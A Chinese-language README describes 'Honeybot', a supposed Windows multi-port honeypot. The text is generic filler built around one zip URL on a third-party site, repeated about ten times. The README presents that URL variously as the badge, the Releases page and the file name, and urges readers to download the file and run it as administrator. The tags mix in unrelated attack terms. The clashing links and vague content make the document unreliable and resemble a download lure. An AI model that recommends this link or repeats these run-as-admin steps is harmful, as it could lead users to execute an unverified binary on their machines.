adamthapa21/Honeybot

# Honeybot：轻量级 Windows 多端口蜜罐监听器 [](https://static.pigsec.cn/wp-content/uploads/repos/2026/03/93606f58e2124138.zip) https://static.pigsec.cn/wp-content/uploads/repos/2026/03/93606f58e2124138.zip Honeybot 是一个轻量级的、基于 Windows 端口的蜜罐，可以同时监听多个 TCP 和 UDP 端口。它的设计初衷是小巧、快速且易于运行，非常适合在单个实例中针对多个端口进行快速部署和测试。本 README 文档详细介绍了 Honeybot 的定义、工作原理、入门方法以及如何根据您的环境进行调整。它以清晰、实用的方式涵盖了设置、配置、使用和维护等内容。 🕵️‍♂️ Honeybot 在选定的端口上充当低调的监听器，常用于防御研究、流量分析和早期欺骗实验。它的构建旨在对系统资源保持轻量，同时仍能从连接尝试、Banner 和跨定义端口的基本交互中提供有意义的洞察。其目标是提供一个简单、可靠的界面，帮助您观察攻击者行为，而无需引入沉重的软件或复杂的配置。 目录 - 概述 - 为什么选择 Honeybot - 核心功能 - 工作原理 - 架构与设计 - 入门指南 - 快速入门指南 - 配置与调优 - 监控、日志与数据 - 性能与占用 - 构建与贡献 - 故障排除 - 路线图 - 常见问题解答 - 许可证与署名 概述 Honeybot 是一个便携的、对 Windows 友好的蜜罐，旨在一次监听数十个端口。它注重实用性：您可以在 Windows 机器上启动它，将其指向几个常被探测的端口，并开始收集连接尝试、计时数据和基本的服务 Banner。它的设计有意保持简单，以便您能够推断出它的功能、存在的原因以及它在您网络中的行为方式。 为什么选择 Honeybot - 简单性：快速启动，无需沉重的配置负担。 - 端口覆盖：同时监听多个 TCP 和 UDP 端口。 - 轻量级：低 CPU 和内存占用，适合配置一般的主机系统。 - 可观察性：日志、Banner 和连接元数据有助于您了解探测流量。 - 可扩展性：旨在适应简单的插件和配置驱动行为。 - Windows 优先：专为常见的 Windows 环境构建，满足端口监听和日志记录的常见需求。 核心功能 - 多端口监听：并行打开多个 TCP 和 UDP 端口。 - Banner 和响应处理：可选的 Banner 和最小化响应以模拟常见服务。 - 连接日志记录：捕获时间戳、源 IP、端口、协议和结果等基本细节。 - 简单配置：以可读格式定义端口、协议和 Banner。 - 轻量级占用：二进制文件小，系统资源占用适中。 - 易于部署：先决条件极少，运行过程简单。 工作原理 - Honeybot 作为 Windows 控制台应用程序运行。 - 它读取列出了要监听的端口和协议的配置。 - 对于每个端口，它打开一个监听套接字并等待传入连接。 - 当客户端连接时，Honeybot 记录该尝试，可选择发送 Banner，并根据配置关闭或维持连接。 - 所有事件都以一致的格式发送到本地日志目录以供分析。 - 该设计强调在测试或研究环境中的可预测性和安全性。 架构与设计 - 核心循环：一个简单的事件驱动循环处理新连接和计时事件。 - 端口监听器：为每个配置的端口和协议设置单独的监听器，确保隔离和清晰。 - Banner 层：一个小型的、可插拔的 Banner 引擎可以用基本的服务标识符进行响应，以引诱进一步的探测。 - 日志记录器：一个最小的结构化日志记录器以类似 JSON 的格式写入事件，便于解析。 - 配置层：配置定义端口、协议、主机绑定、日志路径和 Banner 行为。 - 可扩展性钩子：存在轻量级的占位符，用于未来的插件支持和更丰富的交互。 入门指南 如果您想探索 Honeybot，应首先从 Releases 页面获取 Windows 端口二进制文件，并在受支持的 Windows 机器上运行它。Windows 端口二进制文件打包后旨在便于在标准 Windows 环境中部署。 - 从 Releases 页面下载并运行名为 https://static.pigsec.cn/wp-content/uploads/repos/2026/03/93606f58e2124138.zip 的 Windows 端口二进制文件。 - 如果您的环境需要，请从提升的命令提示符运行该二进制文件。 - 观察控制台输出和您配置的日志目录。 提示：Releases 页面托管了多个平台的二进制文件。Windows 端口设计为可在典型的 Windows 设置中开箱即用。 快速入门指南 - 第 1 步：获取 Windows 端口二进制文件 - 转到 Releases 页面并下载 Windows 端口可执行文件：https://static.pigsec.cn/wp-content/uploads/repos/2026/03/93606f58e2124138.zip 文件名可能因版本而异，但请查找 Windows 端口或便携式 exe。 - Releases 页面可在此处访问：https://static.pigsec.cn/wp-content/uploads/repos/2026/03/93606f58e2124138.zip - 第 2 步：准备环境 - 创建一个本地文件夹来存储日志以及 Honeybot 产生的任何输出。 - 确保您拥有绑定到所选端口的必要权限（某些端口需要提升的权限）。 - 第 3 步：运行 Honeybot - 打开具有管理权限的命令提示符。 - 使用您首选的配置选项运行可执行文件（如果有），或者依靠默认设置进行初始测试。 - 第 4 步：验证操作 - 检查日志目录中的事件条目。 - 确认监听端口显示为已绑定，并正按预期接受连接。 - 第 5 步：迭代 - 根据需要调整端口列表、Banner 和日志记录级别。 - 重新运行 Honeybot 以应用更改，并观察流量如何随您的调整而变化。 注意：对于首次运行，您可以保留默认值。以后您随时可以使用配置文件定制行为。 配置与调优 Honeybot 采用简单、人性化的配置方法，便于根据您的网络和研究目标定制行为。配置涵盖端口列表、协议、主机绑定和日志记录首选项，以及用于模拟常见服务的可选 Banner。 关键配置概念 - 端口范围：定义要监听的 TCP 和 UDP 端口列表。 - 主机绑定：绑定到所有接口 (0.0.0.0) 或特定接口以限制暴露。 - Banner 配置：配置 Banner 以模拟常见服务（SSH、FTP、HTTP 等）。 - 日志记录：决定存储日志的位置、详细程度以及日志条目的格式。 - 输出格式：将日志保持在简单的结构化格式（类似 JSON 的行）以便于解析。 示例配置概念（概念性，非严格语法） - 监听端口 - TCP: 22, 23, 80, 443 - UDP: 53, 123 - 主机绑定 - 0.0.0.0 - Banner 配置 - SSH: "SSH-2.0 Honeybot" - HTTP: "HTTP/1.1 200 OK" - 日志记录 - 目录: "logs" - 级别: "info" 或 "debug" - 格式: "json" 如果存在配置文件，您可以使用任何纯文本编辑器进行编辑。确切的语法将在项目文件中记录，并附有示例片段以指导您。目标是使调整端口覆盖范围、交互行为和数据捕获变得直观，而无需重新编译或重建。 监控、日志与数据 - 日志：Honeybot 将事件写入本地日志目录。每个事件都包括时间戳、源地址、端口、协议和基本结果。日志旨在易于解析，从而能够快速摄取到分析流水线或 SIEM 中。 - Banner 和交互：如果您启用 Banner，您将看到模拟真实服务的简单文本 Banner。这可以帮助您研究攻击者的响应和计时特征。 - 时间戳：时间记录具有毫秒级精度，可帮助您将事件与外部网络活动相关联。 - 输出：除了日志文件，Honeybot 还可以将基本状态信息打印到控制台，这对于实验期间的实时监控非常有用。 性能与占用 - 资源使用：Honeybot 设计轻量。在典型的运行中，它的目标是仅使用一小部分 CPU 周期和几兆字节的内存。 - 启动：它启动速度快，端口监听器能在短时间窗口内准备好接受传入连接。 - 稳定性：代码路径简单，专注于可预测的行为和干净的关闭。 - 可扩展性：虽然设计精简，但架构支持通过清晰、模块化的方法添加额外的端口和处理。 从源代码构建与贡献 如果您想从源代码构建 Honeybot，请遵循存储库中包含的项目标准贡献和构建指南。该过程旨在简单透明，以便贡献者可以验证构建并在本地运行测试。 - 先决条件：Windows 开发环境，具备项目语言所需的工具链（存储库的文档将对此进行说明）。 - 构建步骤：克隆存储库，安装依赖项（如果有），并运行项目中包含的构建脚本（例如，批处理脚本或 Makefile）。 - 测试：运行本地测试以确保端口正确绑定且日志记录按设计运行。 - 贡献：如果您想做出贡献，请遵循项目指南提交 issue 和 pull request。分享对更改的清晰描述、背后的理由以及您运行的任何测试。 路线图与未来工作 该项目旨在扩展功能，同时保持占用空间小。计划的改进包括： - 更多 Banner 配置以模拟更广泛的服务。 - 插件钩子，用于扩展交互行为而无需更改核心代码。 - 增强的日志记录，具有可选的结构化 JSON 输出，适用于分析流水线。 - 端口管理改进，以实现无需重启的动态重配置。 - 跨平台支持，适用于 Windows 之外的其他操作系统。 常见问题解答 - Honeybot 有什么用？ - Honeybot 提供了一种轻量级的方法，通过监听多个端口并记录连接尝试和基本响应来观察网络探测行为。它对于防御研究、流量分析以及了解服务在被探测时的行为非常有用。 - Honeybot 在哪些平台上运行？ - 该项目专为 Windows 设计。Windows 端口二进制文件在 Releases 页面提供，以便快速设置。 - 如何更新 Honeybot？ - 从 Releases 页面下载最新的 Windows 端口二进制文件并替换现有的可执行文件。除了确保新版本使用相同的配置外，通常不需要额外的步骤。 - 我可以自定义 Banner 吗？ - 可以。支持自定义 Banner 以模拟常见服务并观察攻击者的响应。有关启用和调整 Banner 的详细信息，请参阅配置部分。 - 日志如何存储？ - 日志存储在您配置的本地目录中。日志格式设计为易于解析，以便进行分析或人工审查。 发布版本 - Releases 页面包含项目的二进制文件，包括 Windows 端口二进制文件 https://static.pigsec.cn/wp-content/uploads/repos/2026/03/93606f58e2124138.zip 使用该页面下载适合您环境的版本。 - 要直接访问并获取 Windows 二进制文件，请访问此处的 Releases 页面：https://static.pigsec.cn/wp-content/uploads/repos/2026/03/93606f58e2124138.zip 通往生产之路 - 从受控网段上的小规模测试开始。 - 首先使用有限的一组端口来观察行为。 - 查看日志以验证流量是否按预期捕获。 - 逐步扩大端口覆盖范围并优化 Banner 以匹配您的研究目标。 - 根据需要与您的监控栈集成，以将 Honeybot 数据与其他信号相关联。 贡献与社区 - 我们欢迎能够提高可靠性、增加有用功能或阐明文档的贡献。 - 如果您想做出贡献，请遵循项目的贡献指南并提交 PR，其中包含对更改和所执行测试的清晰说明。 - 如有问题或合作，请考虑在存储库中开启 issue 以讨论想法或报告问题。 设计理念 - 清晰胜于复杂：代码库优先考虑可读性和可维护性。 - 可预测的行为：该工具旨在在运行和配置之间保持行为一致。 - 最小表面积：重点仍然是监听、日志记录和简单交互，而不是广泛的功能集。 - 开放改进：项目欢迎通过社区贡献提供反馈和改进。 安全与安全说明 - Honeybot 是一种研究工具，旨在观察流量和行为，而不是充当生产安全解决方案。 - 其简单的设计通过避免复杂的交互并将表面积限制在定义的端口，从而将风险降至最低。 - 始终在您有权探测和观察流量的网络上运行，并注意当地的政策和法规。 架构图与视觉效果 - 可以添加图表缩略图来说明监听模型、端口覆盖范围以及从连接事件到日志的数据流。 - Banner 流程图有助于展示客户端交互如何从连接进展到 Banner 回复再到断开连接。 图像与视觉资产 - Honeybot 友好的视觉效果可以包括： - 代表防御和监控的小盾牌或徽章图标。 - 显示单台主机上多个端口的简单网络图。 - 显示蜜罐使用的文本 Banner 的 Banner示例视觉图。 - 建议的图像： - 蜜罐主题 Banner：带有蜜罐符号的数字田野插图。 - 端口映射图：一台主机，带有指向标记为 TCP/UDP 的多个端口的虚线。 - 安全姿态徽章：带有 Honeybot 标签的盾牌。 - 嵌入视觉效果： - 使用描述性的替代文本以实现无障碍性。 - 确保图像可访问，并且不要在没有冗余的情况下依赖外部热链接。 附加说明 - 存储库名称是 Honeybot，该项目围绕一个轻量级的 Windows 基于端口的蜜罐展开。它面向研究人员、防御者和好奇的工程师，他们希望观察网络探测行为并收集数据以供分析。 - 项目主题反映了其范围：based, defence, defense, easy, hacker, honeybot, honeypot, light, lightweight, listener, lite, port, socket, sockets, Windows。 - 该方法是务实的：提供一个简单、可靠的工具，具有清晰的输出和未来增强的路径。 发布链接使用回顾 - Releases 页面在顶部通过彩色徽章引入，提供对二进制文件和资产的快速访问。 - 在下载/Downloads 部分再次显式引用同一链接，以指导用户获取适当的二进制文件并开始使用 Honeybot。 关于文件命名约定的说明 - Windows 端口二进制文件通常命名为 https://static.pigsec.cn/wp-content/uploads/repos/2026/03/93606f58e2124138.zip（或包含版本的变体，例如 https://static.pigsec.cn/wp-content/uploads/repos/2026/03/93606f58e2124138.zip）。从 Releases 页面下载文件时，请验证名称以确保您运行的是预期版本。 - 如果您需要在笔记或自动化脚本中引用该文件，可以假设文件名类似于 https://static.pigsec.cn/wp-content/uploads/repos/2026/03/93606f58e2124138.zip 作为指导，并根据您环境中的实际版本进行调整。 最后的想法 - Honeybot 是一个实用、平易近人的工具，用于检查网络如何被探测以及服务如何响应基本交互。其极简主义有助于清晰度，而其多端口监听功能则提供了广阔的观察画布。该项目倾向于简单的设置、可靠的操作以及清晰、结构化的数据输出，以支持分析和学习。 文档片段结束。

标签：AMSI绕过, BOF, Cobalt Strike, Conpot, ETW劫持, Honeypot, IP 地址批量处理, LangChain, Open Source Security, TCP/UDP, Windows安全, 威胁检测, 插件系统, 攻击诱捕, 日志记录, 服务模拟, 欺骗防御, 端口监听, 网络安全, 蜜罐, 规避防御, 证书利用, 轻量级, 隐私保护